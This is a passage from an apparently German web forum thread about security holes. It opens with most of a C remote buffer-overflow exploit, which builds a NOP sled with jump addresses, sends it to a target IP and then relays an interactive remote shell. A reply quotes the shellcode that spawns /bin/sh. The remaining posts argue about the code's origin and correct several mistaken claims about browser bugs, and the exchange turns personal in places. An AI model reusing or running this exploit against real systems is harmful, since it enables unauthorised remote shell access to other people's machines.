           printf("Usage: %s target_ip\n",name);  /*print usage information*/
           exit(1);
          }

          main(int argc, char *argv[])
          {
           char string[ATTACK_BUFFER_SIZE];
           char buffer[1024];
           int i,s,k;
           unsigned int jumpaddr;
           struct sockaddr_in dest;
           fd_set fds,rfds;

          if(argv[1]==NULL)     /*no target? -> display usage information*/
              usage(argv[0]);

          dest.sin_family = AF_INET;
           dest.sin_port = htons(PORT);
           dest.sin_addr.s_addr = inet_addr(argv[1]); /*the target*/

          printf("Preparing attack string.\n");
           memset(string,NOP,sizeof(string));
           memcpy(string+CODE_OFFSET,shellcode,strlen(shellcode));
                                               /*copy the machine code into the string*/
           printf("Wrote %u bytes of machine code into string\n",strlen(shellcode));

          /*INFO: ((x+3)/4)*4 yields the next bigger value than x that is a multiple of 4*/

          jumpaddr=BUFFER_LOCATION+((CODE_OFFSET/2+3)/4)*4;
           printf("jumpaddress into the buffer is 0x%x\n",jumpaddr);
           printf("Writing jumpaddress at offset(s): ");
           for(k=((CODE_OFFSET+strlen(shellcode)+3)/4)*4; k<=sizeof(string)-4; k=k+4)
           {
            printf("%u ",k);
            memcpy(string+k,&jumpaddr,4); /*fill rest of string with jumpaddress*/
           }
           printf("\n");

          string[sizeof(string)-3]=13;
           string[sizeof(string)-2]=10;    /*carriage return and linefeed*/
           string[sizeof(string)-1]=0;     /*End of string*/
           printf("Attack string ready\n");

          s=socket(AF_INET,SOCK_STREAM,6);  /*open a socket*/
           if(s<0)
            {
             perror("socket");
             exit(1);
            }
           i=connect(s,(struct sockaddr *)&dest,sizeof(struct sockaddr));
           if(i<0)                                  /*connect to the target*/
            {
             perror("connect");
             exit(1);
            }
           printf("Connected to %s\n",argv[1]);    /*hear, what the target has to say..*/
           i=read(s,buffer,1024);
           buffer[i]=0;
           printf("%s\n",buffer);

          printf("sending attack string....\n");
           write(s,string,sizeof(string));         /*send the string to the target*/
           i=read(s,buffer,1024);
           buffer[i]=0;
           printf("%s\n",buffer);

          /*If all went well, we will now have a shell on the other side*/
           /*the rest of the code will take care of the communication with*/
           /*the shell on the remote host*/

          FD_ZERO(&rfds); /*clear file discriptor set*/
           FD_SET(0,&rfds);
           FD_SET(s,&rfds); /*put s and stdin in fds*/

          while(1)
            {
             memcpy(&fds,&rfds,sizeof(rfds));
             i=select(s+1,&fds,NULL,NULL,NULL);
             if(i==0)
              exit(0);       /*session closed*/
             if(i<0)
              {
               perror("select");
               exit(1);
              }

          if(FD_ISSET(s,&fds))           /*data from target*/
              {
               i=read(s,buffer,1024);
               if(i<1)
                {
                 printf("session closed\n");
                 exit(0);
                }
               write(1,buffer,i);
              }

          if(FD_ISSET(0,&fds))          /*data to target*/
              {
               i=read(0,buffer,1024);
               if(i<1)
                {
                 printf("session closed\n");
                 exit(0);
                }
               write(s,buffer,i);
              }
            }
          }

          1. Hi

            mh...............

            Du benutzt ne Hotmail adresse und meckerst über MS....

            Also hotmail is bei weitem schlimmer als Windows ME *grinz*

            und den Code kann ich auch kopieren und a wengl allgemeins Zeugs dazu schreiben - was soll ihm das jetzt sagen?

            tOM

            1. Hi,

              die hotmail-Adresse ist die Spam-Adresse, die bei so was immer angegeben wird. Da wird nur selten reingeguckt. Aber ich hab keine Lust, wenn nette Programme die Email-Adresse auf den Seiten auslesen, dann vollgespamt zu werden. Dafür gibts dann eben wie gesagt die hotmail-Adresse.

              Liebe Grüße

              Sabine

          2. Hi,

            du hast nicht verstanden was ich geschrieben hab oder?

            Diesen netten Exploit findet man zu hauf im Netz, er ist nicht von _dir_ und auch nicht mehr neu so das es sich lohnen würde ihn zu diskutieren. Hier http://www.3d-crew.com/security/boverflow.html findest du den selben Quelltext, und noch einige mehr, mit schöner Erklärung.

            Einfach mal sowas zu kopieren und hier reinzuposten nur um klüger dazustehen halte ich für falsch. Mal davon abgesehen, hast du überhaupt verstanden was da genau gemacht wird?

            Zudem hab ich doch gar nicht verlangt das du Code posten sollst.

            Gruß

            ueps

            1. Nein, ich bin so dumm wie Bohnenstroh. Nein, ich hab den Code nicht verstanden. *an den Kopf fass* Ohje, ich glaube, ich mache seit Jahren den falschen Beruf. Wie kommte mir das nur passieren? *kopfschüttel*

              Um klüger dazustehen ... ja, ich werde jetzt jeden Tag einen Teil meines Lexikons posten ... damit ich klüger erscheine, weil das hat mein Ego nötig.

              Ich als Frau muss ja auch allen Männern beweisen, dass ich klüger bin als sie und auch Ahnung von Technik hab *heftigstnick zum bekräftigen* Auch das hat mein Ego nötig! Jawohl!

              Du hättest Psychologe werden sollen ueps. Da wärst du besser aufgehoben gewesen *kaputtlach* Nein, ist schon okay *kopftätschel* Mach dir nicht die Mühe.

              Sabine, die sich vor Lachen nicht mehr einkriegt und mittlerweile glaubt, dass sie sich hier in der Gemeinschaft der Halbgötter lieber stillverhalten sollte, da sich sonst wohl einige Männer in ihrem Ego verletzt sehen könnten und trotzdem alles schlecht machen was ihnen unter die Finger kommt *lachend umdreh und geh*

              1. Hallo,

                Nein, ich bin so dumm wie Bohnenstroh. Nein, ich hab den Code nicht verstanden. *an den Kopf fass* Ohje, ich glaube, ich mache seit Jahren den falschen Beruf. Wie kommte mir das nur passieren? *kopfschüttel*

                Du gibst hier Antowrten auf Fragen die niemand gestellt hat.

                Ich als Frau muss ja auch allen Männern beweisen, dass ich klüger bin als sie und auch Ahnung von Technik hab *heftigstnick zum bekräftigen* Auch das hat mein Ego nötig! Jawohl!

                Was hast du denn ständig mit deinem "ich als Frau" gelaber?
                Bis jetzt war es eine sachliche Argumentation ohne irgendwelche Vorurteile. Kann es sein das du diesbezüglich Komplexe hast?

                Du hättest Psychologe werden sollen ueps. Da wärst du besser aufgehoben gewesen *kaputtlach* Nein, ist schon okay *kopftätschel* Mach dir nicht die Mühe.

                Wie alt bist du eigentlich? Deine billigen Anmerkungen in sind ja schon fast peinlich.

                Sabine, die sich vor Lachen nicht mehr einkriegt und mittlerweile glaubt, dass sie sich hier in der Gemeinschaft der Halbgötter lieber stillverhalten sollte, da sich sonst wohl einige Männer in ihrem Ego verletzt sehen könnten und trotzdem alles schlecht machen was ihnen unter die Finger kommt *lachend umdreh und geh*

                ??? Wo behauptet hier jemand ein Halbgott zu sein?  Ich glaube du siehts was du sehen willst. Du bist jedenfalls nicht kritikfähig und benimmst dich in diesem posting wie ein kleines beleidigtes Kind.

                Gruß

                ueps

              2. Hallo Sabine,

                Ich als Frau muss ja auch allen Männern beweisen, dass ich klüger bin

                mit genau solchen Reden schürst Du das Problem, das ohne sie überhaupt
                nicht entstanden ist.

                Wenn Du Kritik nicht vertragen kannst (und Dich dahin flüchten mußt,
                Dich als Frau angegriffen zu fühlen), dann denke bitte _vor_ einem
                Posting etwas länger nach, ob es Sinn macht.

                Ein Exploit ist nun mal etwas Anderes als ein Bug - es wäre nicht
                weniger falsch, wenn ich das behauptet hätte.

                Es ist keine Schande, etwas nicht genau zu wissen - es ist aber eine
                Schande, dies nicht einzusehen.
                Ich hätte beispielsweise über M$IE-Exploits auch nichts Fachkompetentes
                posten können - aber ich sehe ein, daß es so ist, und überlasse diesen
                Spezialbereich anderen (oder mache mich mit entsprechend viel Aufwand
                dort wirklich kompetent, was dann aber ein paar Tage dauern würde).

                Viele Grüße
                      Michael

          3. Hallo Sabine,

            /*the machine code that will execute /bin/sh*/
            char shellcode[] =
                               "\xeb\x18\x5d\x31\xc0\x88\x45\x07\x89\x6d\x08\x89\x45"
                               "\x0c\xb0\x0b\x89\xeb\x8d\x4d\x08\x8d\x55\x0c\xcd\x80"
                               "\xe8\xe3\xff\xff\xff/bin/sh";

            ich habe ja von C nicht wirklich Ahnung, aber dieser Code hat mit dem Anfang des Threads nichts zu tun und auch nicht mit Henryks Kritik. Zuallererst mal ist es ein Exploit fuer Linux und die Fehler im IE/Win* koennen vielleicht das System in den Abgrund stuerzen, geben Dir aber eben *nicht* die Moeglichkeit, beliebigen Code auszufuehren.
            (Dafuer verschickt man eine .exe als Anhang und schreibt dann "Nacktbild von wasweissich" drauf :) ).

            Gruss
            Thomas

            1. Moin,

              Zuallererst mal ist es ein Exploit fuer Linux

              ^^^^^^^^^^^^^^^^^^
              höh?

              und die Fehler im IE/Win* koennen vielleicht das System in den Abgrund stuerzen, geben Dir aber eben *nicht* die Moeglichkeit, beliebigen Code auszufuehren.

              Naja, sagen wir mal, nicht alle tun das ;-) http://www.pivx.com/larholm/unpatched/

              --
              Henryk Plötz
              Grüße aus Berlin

              * Help Microsoft combat software piracy: Give Linux to a friend today! *

              1. Hi,

                Zuallererst mal ist es ein Exploit fuer Linux
                                              ^^^^^^^^^^^^^^^^^^
                höh?

                Ja, das Beispiel das Sabine gepostet hat, ist ein Demo Exploit für ix86 Prozessoren mit Linux als System. Was schon allein daraus ersichtlich wird das der Exploit einen Shell als root öffnet, was in Windows gar nicht geht.

                Gruß

                ueps

    2. Moin,

      Ein Buffer Overflow entsteht wenn Speicherinhalte größer sind als ihnen vom System her zugedacht ist.

      Nein, ein Buffer Overflow entsteht, wenn der Programmierer während der Arbeit geschlafen hat. Wenn man es richtig[tm] macht (also zum Beispiel snprintf statt sprintf nehmen), kann kein Overflow entstehen.

      --
      Henryk Plötz
      Grüße aus Berlin

      * Help Microsoft combat software piracy: Give Linux to a friend today! *

      1. Hi!

        Nein, ein Buffer Overflow entsteht, wenn der Programmierer während der Arbeit geschlafen hat. Wenn man es richtig[tm] macht (also zum Beispiel snprintf statt sprintf nehmen), kann kein Overflow entstehen.

        Hehe, naja, aber eigentlich hat ueps ja recht ... nur wenn so etwas zu stande kommen kann, DANN hat der Programmierer geschlafen :)

        Liebe murrende (ich will raus in die Sonne) Grüße

        Sabine

      2. Ahoi,

        Ein Buffer Overflow entsteht wenn Speicherinhalte größer sind als ihnen vom System her zugedacht ist.

        Nein, ein Buffer Overflow entsteht, wenn der Programmierer während der Arbeit geschlafen hat. Wenn man es richtig[tm] macht (also zum Beispiel snprintf statt sprintf nehmen), kann kein Overflow entstehen.

        Es ist nicht immer ganz einfach alles zu beachten, es kann z.B. schon sehr kritisch werden, wenn eine simple Variable nur 10 Bytes enthalten darf und in diese dann 20 geschrieben werden. Die 10 Bytes die zuviel sind werden dann im Speicher hinter dem Platz der Variable abgelegt und können so möglicherweise Sprungadressen überschreiben. Was sich dann entsprechend ausnutzen lässt.

        Gruß

        ueps

        1. Moin,

          Es ist nicht immer ganz einfach alles zu beachten, es kann z.B. schon sehr kritisch werden, wenn eine simple Variable nur 10 Bytes enthalten darf und in diese dann 20 geschrieben werden.

          Wie gesagt: Wenn der Programmier nicht schläft, können keine 20 Bytes geschrieben werden, wo nur 10 alloziert sind.

          --
          Henryk Plötz
          Grüße aus Berlin

          * Help Microsoft combat software piracy: Give Linux to a friend today! *

  3. Moin,

    Java-Exploit im IE
    Wenn man nun ein JS schreibt, dass z.B. ständig die Hintergrundfarbe einer HTML-Seite ändert, dann ist der IE schnell ausgelastet und dann geht gar nichts mehr.

    Ein ausgelastetes Programm hält $Betriebssystem nicht an. (Für entsprechende Werte von $Betriebssystem.) Im Übrigen verwechselst du Java mit JavaScript.

    Oder man auch mit dem Aufruf eines HTML-Dokuments gleichzeitig ein anderes starten.

    Ach das war mit Mozilla viel lustiger, wenn man ein iframe nimmt, dass die Datei die es enthält einbindet.

    Der WSH ist ein von MS entwickeltes Feature um interaktiven Programmen über das Internet lokalen Zugriff auf den Rechner zu ermöglichen.

    Nein.
    Der WSH ist dazu da, wenigstens ein bisschen vom System über Skripte steuern zu können. Ist aber auch nur wieder von Apple abgeschaut, wo es ähnliches schon seit Ewigkeiten gibt.

    Buffer Overflos im IE

    Du verwirrst IE und Windows-Explorer.

    So, ich denke, das sollte reichen *g*

    Ja. Du hast dir hier meiner Meinung nach aber eher geschadet.

    PS: Die Domain in deiner Email-Addresse ist interessant. ;-)

    --
    Henryk Plötz
    Grüße aus Berlin

    * Help Microsoft combat software piracy: Give Linux to a friend today! *

    1. Hoi!

      Ich kann hier nur Dinge schreiben, die ich entweder selbst so ausprobiert habe oder wo ich dabei war, als es ausprobiert wurde. Als wir das ausprobiert haben, da IST das System stehengeblieben und es ging nichts mehr. Und selbst wenn ich mír damit geschadet haben sollte, dann kann ich das auch nicht ändern. Das ist das mein eigenes Pech fürchte ich.

      Liebe Grüße

      Sabine

    2. Sup!

      Ach das war mit Mozilla viel lustiger, wenn man ein iframe nimmt, dass die Datei die es enthält einbindet.

      Das ist aber kein Bug, sondern - mir wurde das von offizieller Seite bestätigt - ein Feature, denn es gibt keine Regel, die einer HTML-Datei verbietet, sich selbst einzubinden, und wenn der Programmierer das macht, und vergisst, irgendeinen Mechanismus einzubauen, um Endlosschleifen zu verhindern, dann ist das sein Probleme. Dem User kann es egal sein, denn wenn Mozilla abschmiert, nimmt er das OS nicht mit, und der User kann dann die Seite einfach nie wieder besuchen.

      Gruesse,

      Bio